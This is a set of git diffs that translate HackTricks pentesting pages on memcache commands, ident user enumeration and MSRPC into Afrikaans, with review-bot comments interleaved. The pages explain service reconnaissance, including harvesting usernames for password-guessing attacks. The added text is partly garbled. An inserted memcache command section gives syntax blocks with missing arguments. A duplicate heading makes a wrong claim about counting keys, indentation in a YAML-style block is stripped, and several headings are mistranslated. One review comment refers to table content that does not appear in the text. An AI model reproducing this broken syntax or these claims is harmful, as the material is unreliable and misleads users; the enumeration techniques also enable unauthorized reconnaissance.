-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
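Review bot: the Perl `memdump` row of the dumping-tools table in the first hunk of this file still carries a link split across two cells, `[Memcached-libmemcached](https://search.cpan.org/\~dmaki/Memcached-libmemc) | ached/)`, in both the removed and the added line; since the row is being rewritten anyway, join the two fragments into one link target and drop the stray fifth cell so the table renders with four columns. In the same hunk, `64-biet` in the "Verdwynende Sleutels by Oorvloei" paragraph should read `64-bis` (the source says 64bit).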
diff --git a/network-services-pentesting/11211-memcache/memcache-commands.md b/network-services-pentesting/11211-memcache/memcache-commands.md index 95d6e8900..a1349a5d7 100644 --- a/network-services-pentesting/11211-memcache/memcache-commands.md +++ b/network-services-pentesting/11211-memcache/memcache-commands.md @@ -1,64 +1,61 @@ -# Memcache Commands +# Memcache Opdragte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Commands Cheat-Sheet +## Opdragte Spiekbriefie -**From** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached) +**Vanaf** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached) -The supported commands (the official ones and some unofficial) are documented in the [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) document. +Die ondersteunde opdragte (die amptelike en sommige onoffisiële) word gedokumenteer in die [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) dokument. -Sadly the syntax description isn’t really clear and a simple help command listing the existing commands would be much better. Here is an overview of the commands you can find in the [source](https://github.com/memcached/memcached) (as of 19.08.2016): +Ongelukkig is die sintaksisbeskrywing nie regtig duidelik nie en 'n eenvoudige hulpopdrag wat die bestaande opdragte lys, sou baie beter wees. Hier is 'n oorsig van die opdragte wat jy in die [bron](https://github.com/memcached/memcached) kan vind (soos vanaf 19.08.2016): -| Command | Description | Example | +| Opdrag | Beskrywing | Voorbeeld | | --------------------- | --------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| get | Reads a value | `get mykey` | -| set | Set a key unconditionally |

set mykey <flags> <ttl> <size>

<p>Ensure to use \r\n als line breaks when using Unix CLI tools. For example</p> printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211

| -| add | Add a new key | `add newkey 0 60 5` | -| replace | Overwrite existing key | `replace key 0 60 5` | -| append | Append data to existing key | `append key 0 60 15` | -| prepend | Prepend data to existing key | `prepend key 0 60 15` | -| incr | Increments numerical key value by given number | `incr mykey 2` | -| decr | Decrements numerical key value by given number | `decr mykey 5` | -| delete | Deletes an existing key | `delete mykey` | -| flush\_all | Invalidate all items immediately | `flush_all` | -| flush\_all | Invalidate all items in n seconds | `flush_all 900` | -| stats | Prints general statistics | `stats` | -| | Prints memory statistics | `stats slabs` | -| | Print higher level allocation statistics | `stats malloc` | -| | Print info on items | `stats items` | +| get | Lees 'n waarde | `get mykey` | +| set | Stel 'n sleutel onvoorwaardelik in |

set mykey <flags> <ttl> <size>

<p>Sorg dat jy \r\n gebruik as lynafbrekings wanneer jy Unix CLI-hulpmiddels gebruik. Byvoorbeeld</p> printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211

| +| add | Voeg 'n nuwe sleutel by | `add newkey 0 60 5` | +| replace | Skryf bestaande sleutel oor | `replace key 0 60 5` | +| append | Voeg data by bestaande sleutel | `append key 0 60 15` | +| prepend | Voeg data voor bestaande sleutel | `prepend key 0 60 15` | +| incr | Verhoog numeriese sleutelwaarde met 'n gegewe getal | `incr mykey 2` | +| decr | Verminder numeriese sleutelwaarde met 'n gegewe getal | `decr mykey 5` | +| delete | Verwyder 'n bestaande sleutel | `delete mykey` | +| flush\_all | Maak alle items onmiddellik ongeldig | `flush_all` | +| flush\_all | Maak alle items binne n sekond ongeldig | `flush_all 900` | +| stats | Druk algemene statistieke uit | `stats` | +| | Druk geheue-statistieke uit | `stats slabs` | +| | Druk hoër vlak toewysingsstatistieke uit | `stats malloc` | +| | Druk inligting oor items uit | `stats items` | | | | `stats detail` | | | | `stats sizes` | -| | Resets statistics counters | `stats reset` | -| lru\_crawler metadump | Dump (most of) the metadata for (all of) the items in the cache | `lru_crawler metadump all` | -| version | Prints server version. | `version` | -| verbosity | Increases log level | `verbosity` | -| quit | Terminate session | `quit` | +| | Stel statistiektellers terug | `stats reset` | +| lru\_crawler metadump | Dump (meeste van) die metadata vir (al) die items in die cache | `lru_crawler metadump all` | +| version | Druk bedienerweergawe uit | `version` | +| verbosity | Verhoog logvlak | `verbosity` | +| quit | Beëindig sessie | `quit` | -#### Traffic Statistics - -You can query the current traffic statistics using the command +#### Verkeersstatistieke +Jy kan die huidige verkeersstatistieke navraag doen deur die opdrag te gebruik ``` stats ``` +Jy sal 'n lys kry wat die aantal verbindings, bytes in/uit en nog baie meer diens. -You will get a listing which serves the number of connections, bytes in/out and much more. - -Example Output: - +Voorbeeld Uitset: ``` STAT pid 14868 STAT uptime 175931 
@@ -84,17 +81,101 @@ STAT limit_maxbytes 52428800 STAT threads 1 END ``` +#### Geheue Statistieke -#### Memory Statistics - -You can query the current memory statistics using - +Jy kan die huidige geheue statistieke navraag doen deur gebruik te maak van ``` stats slabs ``` +# Memcache Commands -Example Output: +Hier is 'n lys van die mees gebruikte Memcache-opdragte: +## GET + +Die `GET`-opdrag word gebruik om die waarde van 'n sleutel in Memcache te kry. Die sintaks is as volg: + +```bash +GET +``` + +## SET + +Die `SET`-opdrag word gebruik om 'n waarde aan 'n sleutel in Memcache toe te ken. Die sintaks is as volg: + +```bash +SET [noreply] + +``` + +## ADD + +Die `ADD`-opdrag word gebruik om 'n waarde aan 'n sleutel in Memcache toe te voeg, maar slegs as die sleutel nog nie bestaan nie. Die sintaks is as volg: + +```bash +ADD [noreply] + +``` + +## REPLACE + +Die `REPLACE`-opdrag word gebruik om 'n waarde aan 'n sleutel in Memcache toe te ken, maar slegs as die sleutel reeds bestaan. Die sintaks is as volg: + +```bash +REPLACE [noreply] + +``` + +## DELETE + +Die `DELETE`-opdrag word gebruik om 'n sleutel en die bybehorende waarde uit Memcache te verwyder. Die sintaks is as volg: + +```bash +DELETE [noreply] +``` + +## INCR + +Die `INCR`-opdrag word gebruik om die waarde van 'n sleutel in Memcache met 'n sekere bedrag te verhoog. Die sintaks is as volg: + +```bash +INCR [noreply] +``` + +## DECR + +Die `DECR`-opdrag word gebruik om die waarde van 'n sleutel in Memcache met 'n sekere bedrag te verminder. Die sintaks is as volg: + +```bash +DECR [noreply] +``` + +## APPEND + +Die `APPEND`-opdrag word gebruik om data aan die einde van 'n waarde van 'n sleutel in Memcache toe te voeg. Die sintaks is as volg: + +```bash +APPEND [noreply] + +``` + +## PREPEND + +Die `PREPEND`-opdrag word gebruik om data aan die begin van 'n waarde van 'n sleutel in Memcache toe te voeg. 
Die sintaks is as volg: + +```bash +PREPEND [noreply] + +``` + +## CAS + +Die `CAS`-opdrag word gebruik om 'n waarde aan 'n sleutel in Memcache toe te ken, maar slegs as die waarde nie verander is sedert die laaste keer wat dit opgevra is nie. Die sintaks is as volg: + +```bash +CAS [noreply] + +``` ``` STAT 1:chunk_size 80 STAT 1:chunks_per_page 13107 @@ -115,19 +196,23 @@ STAT active_slabs 3 STAT total_malloced 3145436 END ``` +As jy onseker is of jy genoeg geheue het vir jou memcached instansie, moet jy altyd kyk na die "evictions" tellers wat deur die "stats" bevel gegee word. As jy genoeg geheue het vir die instansie, moet die "evictions" teller 0 wees of ten minste nie toeneem nie. -If you are unsure if you have enough memory for your memcached instance always look out for the “evictions” counters given by the “stats” command. If you have enough memory for the instance the “evictions” counter should be 0 or at least not increasing. - -#### Which Keys Are Used? - -There is no builtin function to directly determine the current set of keys. However you can use the +#### Watter Sleutels Word Gebruik? +Daar is geen ingeboude funksie om direk die huidige stel sleutels te bepaal nie. Jy kan egter die ``` stats items ``` +## Commando om te bepaal hoeveel sleutels daar bestaan. -command to determine how many keys do exist. +Om te bepaal hoeveel sleutels daar in die memcache-stoorplek bestaan, kan jy die volgende bevel gebruik: +```bash +stats items +``` + +Hierdie bevel sal 'n lys van statistieke vir elke item in die memcache-stoorplek gee. Die aantal sleutels kan bepaal word deur die telling van die items in die lys. ``` stats items STAT items:1:number 220 
@@ -137,19 +222,18 @@ STAT items:2:age 1405 [...] END ``` - -This at least helps to see if any keys are used. To dump the key names from a PHP script that already does the memcache access you can use the PHP code from [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html). +Dit help ten minste om te sien of enige sleutels gebruik word. Om die sleutelname uit 'n PHP-skripsie te dump wat reeds die memcache-toegang doen, kan jy die PHP-kode van [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html) gebruik.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
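Review bot: two rows in the translated command table of the first hunk mis-state the source: the second `flush\_all` row, "Maak alle items binne n sekond ongeldig", loses the placeholder n (in Afrikaans a bare `n` reads as the article 'n), so write "binne n sekondes" with n marked as a placeholder; and the sentence after the `stats` fence, "Jy sal 'n lys kry wat ... en nog baie meer diens", is a word-for-word rendering of "serves" where "bevat" or "lys" is meant.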
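Review bot: the hunk starting at `@@ -84,17 +81,101 @@` injects content that is not a translation of anything removed: a second top-level heading `# Memcache Commands` plus GET/SET/ADD/REPLACE/DELETE/INCR/DECR/APPEND/PREPEND/CAS subsections are inserted between the `stats slabs` fence and its `STAT 1:chunk_size 80` listing, while the `-Example Output:` label is deleted without an Afrikaans replacement, so the slab listing now follows the CAS block with no introduction. The inserted syntax blocks are also unusable as written: `GET` has no key argument, and `SET [noreply]`, `ADD [noreply]`, `CAS [noreply]` and the rest have lost their key/flags/exptime/bytes (and cas unique) arguments, which looks like angle-bracket placeholders being stripped as HTML. Drop the injected section and add `+Voorbeeld Uitset:` as the translation of the removed label; the command reference already exists in the table earlier in the file.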
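Review bot: in the hunk starting at `@@ -115,19 +196,23 @@` the sentence "Daar is geen ingeboude funksie ... Jy kan egter die `stats items` ... command to determine how many keys do exist." is broken: its continuation becomes a `## Commando om te bepaal hoeveel sleutels daar bestaan.` heading ("Commando" is not Afrikaans; "opdrag" is used everywhere else in the file), followed by a second, duplicate `stats items` fence and a new paragraph. That paragraph's claim that the output lists statistics per item and that the key count is found by counting entries is contradicted by the sample output in the same hunk, `STAT items:1:number 220`, which is a per-slab-class counter. Restore the single sentence ("... `stats items` opdrag gebruik om te bepaal hoeveel sleutels daar bestaan.") and remove the duplicate block and paragraph.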
diff --git a/network-services-pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md index 705b48c1f..4aa133278 100644 --- a/network-services-pentesting/113-pentesting-ident.md +++ b/network-services-pentesting/113-pentesting-ident.md @@ -2,63 +2,60 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Basic Information +## Basiese Inligting -The **Ident Protocol** is used over the **Internet** to associate a **TCP connection** with a specific user. Originally designed to aid in **network management** and **security**, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. +Die **Ident-protokol** word oor die **Internet** gebruik om 'n **TCP-verbinding** te assosieer met 'n spesifieke gebruiker. Oorspronklik ontwerp om te help met **netwerkbestuur** en **sekuriteit**, werk dit deur 'n bediener toe te laat om 'n klient op poort 113 te ondervra om inligting te versoek oor die gebruiker van 'n bepaalde TCP-verbinding. -However, due to modern privacy concerns and the potential for misuse, its usage has decreased as it can inadvertently reveal user information to unauthorized parties. Enhanced security measures, such as encrypted connections and strict access controls, are recommended to mitigate these risks. - -**Default port:** 113 +Tog, as gevolg van moderne privaatheidskwessies en die potensiaal vir misbruik, het die gebruik daarvan afgeneem omdat dit onbedoeld gebruikersinligting aan ongemagtigde partye kan onthul. Verbeterde sekuriteitsmaatreëls, soos versleutelde verbindinge en streng toegangskontroles, word aanbeveel om hierdie risiko's te verminder. 
+**Verstekpoort:** 113 ``` PORT STATE SERVICE 113/tcp open ident ``` +## **Opsomming** -## **Enumeration** +### **Handleiding - Kry gebruiker/Identifiseer die diens** -### **Manual - Get user/Identify the service** - -If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing: +As 'n masjien die ident en samba (445) dienste hardloop en jy is verbind met samba deur die poort 43218, kan jy uitvind watter gebruiker die samba-diens hardloop deur die volgende te doen: ![](<../.gitbook/assets/image (15) (1) (1).png>) -If you just press enter when you conenct to the service: +As jy net Enter druk wanneer jy met die diens verbind: ![](<../.gitbook/assets/image (16) (1) (1).png>) -Other errors: +Ander foute: ![](<../.gitbook/assets/image (17) (1).png>) ### Nmap -By default (`-sC``) nmap will identify every user of every running port: - +Standaard (`-sC``) sal nmap elke gebruiker van elke lopende poort identifiseer: ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3p2 Debian 9 (protocol 2.0) |_auth-owners: root -| ssh-hostkey: +| ssh-hostkey: | 1024 88:23:98:0d:9d:8a:20:59:35:b8:14:12:14:d5:d0:44 (DSA) |_ 2048 6b:5d:04:71:76:78:56:96:56:92:a8:02:30:73:ee:fa (RSA) 113/tcp open ident 
@@ -68,11 +65,9 @@ PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.0.24 (workgroup: LOCAL) |_auth-owners: root ``` +### Ident-gebruiker-enum -### Ident-user-enum - -[**Ident-user-enum**](https://github.com/pentestmonkey/ident-user-enum) is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. - +[**Ident-gebruiker-enum**](https://github.com/pentestmonkey/ident-user-enum) is 'n eenvoudige PERL-skrip om die ident-diens (113/TCP) te ondervra om die eienaar van die proses wat op elke TCP-poort van 'n teikensisteem luister, te bepaal. Die lys van gebruikersname wat ingesamel word, kan gebruik word vir wagwoordgissingaanvalle op ander netwerkdienste. Dit kan geïnstalleer word met `apt install ident-user-enum`. ``` root@kali:/opt/local/recon/192.168.1.100# ident-user-enum 192.168.1.100 22 113 139 445 ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum ) @@ -82,53 +77,50 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum ) 192.168.1.100:139 root 192.168.1.100:445 root ``` - ### Shodan * `oident` -## Files +## Lêers identd.conf
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloei te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Ident #Protocol Abbreviation if there is one. Port_Number: 113 #Comma separated if there is more than one. Protocol_Description: Identification Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for Ident - Note: | - The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. +Name: Notes +Description: Notes for Ident +Note: | +The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. - https://book.hacktricks.xyz/pentesting/113-pentesting-ident +https://book.hacktricks.xyz/pentesting/113-pentesting-ident Entry_2: - Name: Enum Users - Description: Enumerate Users - Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports) +Name: Enum Users +Description: Enumerate Users +Note: apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports) ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
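Review bot: two headings in the first hunk of this file change meaning: `## **Opsomming**` means "summary", whereas the removed `## **Enumeration**` is the pentest sense (Enumerasie), and `### **Handleiding - Kry gebruiker/Identifiseer die diens**` renders "Manual" as "handbook" where "by hand" (Handmatig) is meant. The pre-existing stray backtick in `(`-sC``)` is also carried into the translated Nmap line; drop it while the line is being rewritten.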
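Review bot: the "HackTricks Outomatiese Opdragte" fence in the hunk starting at `@@ -82,53 +77,50 @@` should not have been touched: the added lines strip the leading indentation from `Name:`, `Description:` and `Note:` under `Entry_1:` and `Entry_2:`, and from the `https://book.hacktricks.xyz/pentesting/113-pentesting-ident` line inside the `Note: |` block scalar, so the YAML-style nesting and the block scalar's content are lost. Restore the removed indented lines verbatim; the code block carries no translatable text.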
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index c9deb019b..7b42d54e4 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -2,54 +2,50 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat begin en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -The Microsoft Remote Procedure Call (MSRPC) protocol, a client-server model enabling a program to request a service from a program located on another computer without understanding the network's specifics, was initially derived from open-source software and later developed and copyrighted by Microsoft. - -The RPC endpoint mapper can be accessed via TCP and UDP port 135, SMB on TCP 139 and 445 (with a null or authenticated session), and as a web service on TCP port 593. 
